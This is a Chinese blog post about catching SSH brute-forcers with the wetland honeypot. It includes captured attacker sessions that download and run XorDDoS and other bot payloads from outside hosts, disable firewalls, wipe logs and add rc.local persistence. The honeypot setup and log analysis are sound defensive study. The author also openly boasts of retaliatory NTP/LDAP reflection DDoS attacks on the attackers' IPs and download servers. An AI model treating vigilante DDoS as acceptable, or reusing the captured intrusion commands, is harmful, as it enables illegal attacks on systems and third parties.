背景

端午节出去玩之前,为了方便管理内网nas的下载,在路由器上开了frp(内网穿透),把nas的web界面和ssh端口映射到一台外网服务器上。web界面的端口在10000以下,ssh端口在20000以上.
晚上到酒店的时候,登录上nas的web界面,看到日志,有人从路由器(192.168.1.1)对nas进行ssh爆破,1小时一次,尝试的用户名ftpadmin、mysql、root、admin、等等。于是去frp服务器上找日志,日志里面竟然看不到ssh连接的ip。

捕获ip

于是把frp关了,把vps的sshd监听的22端口改到那个端口。

1
# vim /etc/ssh/sshd_config

修改

1
Port 22

然后重启sshd

1
service ssh restart

过了一会儿,用手机的JuiceSSH连上vps,记得改ssh连接端口,查看ssh认证日志

1
# cat /var/log/auth.log

找到了那个傻吊

1
2
3
4
5
6
7
8
9
10
11
Jun 18 18:22:28 xx sshd[31547]: Connection closed by 118.186.17.x [preauth]
Jun 18 18:48:21 xx sshd[31563]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.186.17.x user=root
Jun 18 18:48:23 xx sshd[31563]: Failed password for root from 118.186.17.x port 34658 ssh2
Jun 18 18:48:23 xx sshd[31563]: Connection closed by 118.186.17.x [preauth]
Jun 18 19:14:20 xx sshd[31570]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.186.17.x user=root
Jun 18 19:14:21 xx sshd[31570]: Failed password for root from 118.186.17.x port 52498 ssh2
Jun 18 19:14:22 xx sshd[31570]: Connection closed by 118.186.17.x [preauth]
Jun 18 19:17:01 xx CRON[31572]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 18 19:17:01 xx CRON[31572]: pam_unix(cron:session): session closed for user root
Jun 18 19:40:14 xx sshd[31577]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.186.17.x user=root
Jun 18 19:40:16 xx sshd[31577]: Failed password for root from 118.186.17.x port 42118 ssh2

开始还会爆破其他的用户,现在就只爆破root用户了,ssh2中的2是配置文件中的protocol 2

探测ip

查了下ip,是北京那边的。

用LDAP和NTP的方式d了200秒,d的时候是挂了,但是d完又恢复了。以为是家宽。

随即用nmap扫描端口和系统指纹信息,确定目标信息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Nmap scan report for 118.186.17.x
Host is up (0.075s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
443/tcp open https
445/tcp filtered microsoft-ds
2288/tcp open netml
3306/tcp open mysql
5800/tcp filtered xxc-http
5900/tcp filtered xxc
8888/tcp open sun-answerbook
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 19 hops

nc看了下2288,5800,5900,8888
2288,8888是ssh端口
5800,5900是nginx端口

2288有点像是路由器端口映射的感觉,但是d了那么久,如果是路由器早就死了吧。
应该是一台真正的服务器。

ipip.net上面查了下这个ip

1
2
3
4
5
6
7
地理位置 中国,北京,北京 (电信) 
ASN 4134 (CHINANET-BACKBONE No.31,Jin-rong Street, CN)
威胁情报:
dshield : 20180620 : 僵尸网络
mirrors : 20180516 : 垃圾邮件
firehol : 20180516 : 恶意软件
firehol : 20180620 : 网络攻击

于是想到在微步威胁情报上查下ip
果然有这个ip的信息
从2017-08-27到现在一直有恶意信息的记录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
情报源 	   发现时间 	情报类型
开源情报 2018-06-11 扫描
开源情报 2018-05-29 可疑
开源情报 2018-05-10 可疑
ThreatBook Labs 2018-05-04 IDC服务器
开源情报 2017-11-23 扫描 已过期
开源情报 2017-11-16 可疑
开源情报 2017-09-20 恶意软件
开源情报 2017-09-20 可疑
开源情报 2017-09-20 可疑
开源情报 2017-09-20 可疑
开源情报 2017-09-20 可疑
开源情报 2017-09-20 可疑
开源情报 2017-09-19 恶意软件
开源情报 2017-09-12 扫描
ThreatBook Labs 2017-09-01 僵尸网络
ThreatBook Labs 2017-09-01 垃圾邮件,僵尸网络
开源情报 2017-08-30 扫描
开源情报 2017-08-29 可疑
开源情报 2017-08-29 可疑
ThreatBook Labs 2017-08-27 垃圾邮件 已过期
ThreatBook Labs 2016-07-08 IDC服务器

感觉是一个厉害的家伙。

ssh蜜罐

不如来装个蜜罐,看看这个人ssh进来后会干什么,会下载什么文件,从哪下载,这样会留下更多的信息

搜索了下,看中了这个蜜罐 基于Paramiko的高交互SSH蜜罐 .
是去年8月写的文章,去年4月的时候,我在树莓派上装过kippo,kippo启动也很简单的,clone下来代码,修改下配置文件,就能启动。但是这次我想试试这个新的蜜罐。

这个蜜罐名叫wetland,github开源地址:https://github.com/ohmyadd/wetland

使用docker方式的部署:

安装docker:curl -sSL https://get.docker.com/ | sh

  1. 启动sshd的docker
    1
    docker run -d --name sshd rastasheep/ubuntu-sshd

然后运行docker inspect sshd查看这个容器的ip地址
如果这是你的第一个docker容器,ip一般都是172.17.0.2

  1. 从环境变量的方式启动wetland
    1
    docker run -d --name wetland -v ~/log:/root/wetland/log -p 22:22 -e SENSOR=test -e SSHDADDR=172.17.0.2 -e BEARYCHAT1='https://hook.bearychat.com/xxx' ohmyadd/wetland
  • SENSOR: 传感器,[wetland]的名字
  • SSHADDR:sshd的容器ip
  • BEARYCHAT: bearychat 的hook地址

bearychat是一个团队协作的平台,可以添加机器人聊天,机器人会有个hook地址,如果有信息,会推送到机器人,机器人再发送给你。

设置方法:
团队后台 - 机器人 - 添加机器人 - 自定义tab - Incoming - 添加,之后会看到形如https://hook.bearychat.com/xxx的hook地址。

启动好了后,我这边测试了下。
ssh [vps-ip] -p [ssh-port]

随便输了两个弱口令,连上了ssh。机器人那边就已经发送了消息,hacker ip为xxxx的连上了sensor为test的ssh。运行了什么命令也能及时看到。

捕获猎物1

之后的两天都没有消息,查看auth.log,发现那个傻逼连上了ssh又退出了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Jun 19 00:20:37 xx sshd[30738]: Received signal 15; terminating.
Jun 19 00:20:37 xx sshd[2103]: Server listening on 0.0.0.0 port 2368.
Jun 19 00:20:37 xx sshd[2103]: Server listening on :: port 2368.
Jun 19 00:21:56 xx sshd[2128]: pam_unix(sshd:session): session opened for user root by (uid=0)
Jun 19 00:22:29 xx sshd[2128]: pam_unix(sshd:session): session closed for user root
Jun 19 00:31:01 xx CRON[2399]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 00:31:14 xx CRON[2399]: pam_unix(cron:session): session closed for user root
Jun 19 00:31:39 xx sshd[1892]: pam_unix(sshd:session): session closed for user root
Jun 19 01:17:01 xx CRON[3203]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 01:17:01 xx CRON[3203]: pam_unix(cron:session): session closed for user root
Jun 19 02:17:01 xx CRON[3394]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 02:17:01 xx CRON[3394]: pam_unix(cron:session): session closed for user root
Jun 19 03:17:01 xx CRON[3561]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 03:17:01 xx CRON[3561]: pam_unix(cron:session): session closed for user root
Jun 19 04:17:01 xx CRON[3729]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 04:17:01 xx CRON[3729]: pam_unix(cron:session): session closed for user root
Jun 19 05:17:01 xx CRON[3901]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 05:17:01 xx CRON[3901]: pam_unix(cron:session): session closed for user root
Jun 19 06:17:01 xx CRON[4020]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 06:17:01 xx CRON[4020]: pam_unix(cron:session): session closed for user root
Jun 19 07:17:01 xx CRON[4312]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 07:17:01 xx CRON[4312]: pam_unix(cron:session): session closed for user root
Jun 19 08:17:01 xx CRON[4465]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 08:17:01 xx CRON[4465]: pam_unix(cron:session): session closed for user root
Jun 19 09:17:01 xx CRON[4659]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 09:17:01 xx CRON[4659]: pam_unix(cron:session): session closed for user root
Jun 19 10:17:01 xx CRON[4721]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 10:17:01 xx CRON[4721]: pam_unix(cron:session): session closed for user root
Jun 19 11:17:01 xx CRON[4777]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 11:17:01 xx CRON[4777]: pam_unix(cron:session): session closed for user root

非常稳定的一小时一次
只是进入到了ssh认证环节就退出了,蜜罐那边没日志,说明连蜜罐都没进,推测可能是ssh key不同的缘故。
ssh key更改了,ssh连接会提示key不通,需要移除掉老的记录,而脚本没有考虑到这种情况。

于是我换了台快到期的vps,装上蜜罐,等待猎物。

过了一会儿,ipad的bearychat疯狂推送。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
Sensor:	rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: login
Content: login successful

Sensor: rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: exec command
Content: cd /bin/
curl http://107.150.36.133/g.txt -o ygljglkjgfg0
chmod +x ygljglkjgfg0
/bin/ygljglkjgfg0
wget http://107.150.36.133/g.txt -O ygljglkjgfg1
chmod +x ygljglkjgfg1
/bin/ygljglkjgfg1
good http://107.150.36.133/g.txt -O ygljglkjgfg2
chmod +x ygljglkjgfg2
/bin/ygljglkjgfg2
sleep 2
wget http://107.150.36.133/w.txt -O sdf3fslsdf13
chmod +x sdf3fslsdf13
/bin/sdf3fslsdf13
good http://107.150.36.133/w.txt -O sdf3fslsdf14
chmod +x sdf3fslsdf14
/bin/sdf3fslsdf14
curl http://107.150.36.133/w.txt -o sdf3fslsdf15
chmod +x sdf3fslsdf15
/bin/sdf3fslsdf15
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
cat /dev/null >/root/.bash_history
ls -la /etc/daemon.cfg
exit $?

Sensor: rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: exec_request
Content: success

Sensor: rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: exec_request
Content: success

Sensor: rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: exec command
Content: ls -la /etc/daemon.cfg

这个小婊砸把我的wget命令 改为good??
然后下载了两个程序
ls -la /etc/daemon.cfg 应该是确认程序是否正确运行了

先下载g.txtw.txt 传在线分析平台

https://x.threatbook.cn/report/scan/47bf33fd353be8b334f188c839dac4a6a1b71fe220a1c98122628cc5fddabe3d-1513073717870

https://x.threatbook.cn/report/scan/444ccc1249fe4a9ad6a24cea79ec60be45a438405f3c86346ff72433afbb3a71-1513073215948

这是个ddos客户端,准确来说是XordDOS

file看下

1
2
─[$] <> file w.txt 
w.txt: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

是可执行文件,不会逆向的菜鸡qwq。。。。
如果会逆向的话,可以追踪下,应该可以找到C&C服务器的地址

后来在freebuf搜到了一篇分析XorDDos的文章, 一次XorDDos变种样本的分析实战记录

后来我就重置了蜜罐。现在回想起来,应该使用netstat 查看下连接,说不定能知道,但是也有可能C&C服务器在下发任务的时候才会连接上,也不知道是主动连接还是被动连接,,,反正程序在咱手上了,什么时候运行下也不就能验证了

文件地址

完了后,给103和107各d 100秒NTP,截止发稿时间是打不开了嘿嘿

捕获猎物2

上一次是在rom机器上,这次回到第一次的机器上,在我记录博客的时候,翻看auth.log,发现有个新的ip(103.219.112.69)在持续的爆破宿主机的ssh,ssh上次已经是改到2000+了,蜜罐在20000+。

改端口的同时,顺便重置下蜜罐吧

1
2
docker stop wetland
docker rm wetland

修改宿主机的ssh监听端口
重新运行wetland的docker,把端口改到之前ssh的端口即可。

103没等来,等来了123同学。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
Sensor:	x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: login
Content: login successful

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1987

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: service iptables stop

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: cd /tmp

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: wget http://mdb7.cn:8081/exp

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: chmod 0777 /root/exp
Sensor: x

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: nohup /root/exp > /dev/null 2>&1 &

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: rm -f /var/log/wtmp

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: rm -rf exp

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: wget -P/tmp http://123.249.27.28:613/pud

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: chmod 0777 /tmp/pud

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: /tmp/./pud

mdb7.cn访问不了

下载pub上传 分析报告

后门+ddos

123.249.27.28 d了50秒NTP,现在挂了
这个ip也是长期嘿产
https://x.threatbook.cn/ip/123.249.27.28

pub文件备份

kill杀了几个进程,这次这个有点垃圾,服务器打挂了不说,程序没有设置自动启动.

刚刚看到github有个kippo-detect的项目,用来检测是不是蜜罐,我觉得这些爆破小子应该先检测下是不是蜜罐

猎物3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Sensor:	rom2
Hacker: 104.223.213.141
MyIP: 172.17.0.3
Action: exec command
Content: #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://104.223.213.141/a21jj
curl -O http://104.223.213.141/a21jj
chmod +x a21jj
./a21jj

Sensor: rom2
Hacker: 104.223.213.141
MyIP: 172.17.0.3
Action: exec command
Content: ls -la /var/run/gcc.pid

[email protected]:~# cat /var/run/gcc.pid
uhukenmftxpilnavmgpzoxmjalenfylb

猎物n?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
wget http://96.44.186.214:5414/Linux-syn19001ss
chmod 0755 /root/Linux-syn19001ss
nohup /root/Linux-syn19001ss > /dev/null 2>&1 &
chmod 777 Linux-syn19001ss
./Linux-syn19001ss
chmod 0755 /root/Linux-syn19001ss
nohup /root/Linux-syn19001ss &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 Linux-syn19001ss
chmod u+x Linux-syn19001ss
./Linux-syn19001ss &
chmod u+x Linux-syn19001ss
./Linux-syn19001ss &
cd /tmp
service iptables stop
wget http://96.44.186.214:5414/Linux-udp19001s
chmod 0755 /root/Linux-udp19001s
nohup /root/Linux-udp19001s > /dev/null 2>&1 &
chmod 777 Linux-udp19001s
./164
chmod 0755 /root/Linux-udp19001s
nohup /root/Linux-udp19001s &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 Linux-udp19001s
chmod u+x Linux-udp19001s
./Linux-udp19001s &
chmod u+x dos6cc4
./Linux-udp19001s &
cd /tmp
echo "cd /root/">>/etc/rc.local
echo "./Linux-syn19001ss&">>/etc/rc.local
echo "./Linux-udp19001s&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

猎物n+1

1
2
3
4
5
Sensor:	rom3
Hacker: 173.249.54.210
MyIP: 172.17.0.3
Action: exec command
Content: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://167.99.39.63/8UsA.sh; curl -O http://167.99.39.63/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 167.99.39.63 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 167.99.39.63; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 167.99.39.63 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *

猎物n+2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
 29  wget http://96.44.186.214:5414/liuxs512
30 chmod 0755 /root/liuxs512
31 nohup /root/liuxs512 > /dev/null 2>&1 &
32 chmod 777 liuxs512
33 ./liuxs512
34 chmod 0755 /root/liuxs512
35 nohup /root/liuxs512 &gt; /dev/null 2&gt;&amp;1 &amp;
36 chmod 0777 liuxs512
37 chmod u+x liuxs512
38 ./liuxs512 &
39 chmod u+x liuxs512
40 ./liuxs512 &
41 cd /tmp
42 service iptables stop
43 wget http://96.44.186.214:5414/liuxs512
44 chmod 0755 /root/liuxs512
45 nohup /root/liuxs512 > /dev/null 2>&1 &
46 chmod 777 liuxs512
47 ./164
48 chmod 0755 /root/liuxs512
49 nohup /root/liuxs512 &gt; /dev/null 2&gt;&amp;1 &amp;
50 chmod 0777 liuxs512
51 chmod u+x liuxs512
52 ./liuxs512 &
53 chmod u+x dos6cc4
54 ./liuxs512 &
55 cd /tmp
56 echo "cd /root/">>/etc/rc.local
57 echo "./liuxs512&">>/etc/rc.local
58 echo "/etc/init.d/iptables stop">>/etc/rc.local
59 service iptables stop
60 wget http://96.44.186.214:5414/liuxs512
61 chmod 0755 /root/liuxs512
62 nohup /root/liuxs512 > /dev/null 2>&1 &
63 chmod 777 liuxs512
64 ./liuxs512
65 chmod 0755 /root/liuxs512
66 nohup /root/liuxs512 &gt; /dev/null 2&gt;&amp;1 &amp;
67 chmod 0777 liuxs512
68 chmod u+x liuxs512
69 ./liuxs512 &
70 chmod u+x liuxs512
71 ./liuxs512 &
72 cd /tmp
73 service iptables stop
74 wget http://96.44.186.214:5414/liuxs512
75 chmod 0755 /root/liuxs512
76 nohup /root/liuxs512 > /dev/null 2>&1 &
77 chmod 777 liuxs512
78 ./164
79 chmod 0755 /root/liuxs512
80 nohup /root/liuxs512 &gt; /dev/null 2&gt;&amp;1 &amp;
81 chmod 0777 liuxs512
82 chmod u+x liuxs512
83 ./liuxs512 &
84 chmod u+x dos6cc4
85 ./liuxs512 &
86 cd /tmp
87 echo "cd /root/">>/etc/rc.local
88 echo "./liuxs512&">>/etc/rc.local
89 echo "/etc/init.d/iptables stop">>/etc/rc.local
90 ps aux
91 ifconfig
92 ip address
93 address
94 ipaddress
95 ipadrss
96 passwd
97 /sbin/ifconfig
98 apt-get install net-tools
99 /sbin/ifconfig/sbin/ifconfig
100 /sbin/ifconfig
101 who
102 history

还把我密码改了
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: root123

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338


IncomingIncoming
Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 62.112.11.81
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'172.217.23.206', 80)
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content:
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install [email protected]:~# apt-get pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: [email protected]:~#
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: E: Invalid operation pip
Sensor: rom3
Hacker: 217.23.12.117
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.12.117
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'216.58.212.206', 80)
Sensor: rom3
Hacker: 62.210.37.8
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 62.210.37.8
MyIP: 172.17.0.3
Action: shell_request
Content: success
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install Python-pip
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: yum install Python-pip
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install python-pip
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: y
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 26499), dest:(u'204.79.197.200', 80)
Sensor: rom3
Hacker: 194.88.107.163
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'172.217.23.206', 80)
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: sudo apt-get install python-pip python-dev build-essential
Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'34.207.2.165', 80)
Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: sudo apt-get install python-pip python-dev build-essudo apt-get install python-pip python-dev build-essential
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: cd /var/tmp/scanner
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: chmod 777 *
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ./start 188
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 23550), dest:(u'13.107.21.200', 80)
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell_request
Content: success
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ifconfig
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ifconfig
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ifconfig
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: address
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ipaddress
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ipadrss
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: passwd
Sensor: rom3
Hacker: 217.23.3.138
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'157.240.20.35', 80)
Sensor: rom3
Hacker: 217.23.3.138
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.3.138
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: root123
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: root123
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: /sbin/ifconfig
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install net-tools
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content:
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: /sbin/ifconfig/sbin/ifconfig(ESC)[5~
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: /sbin/ifconfig

还帮我装pip python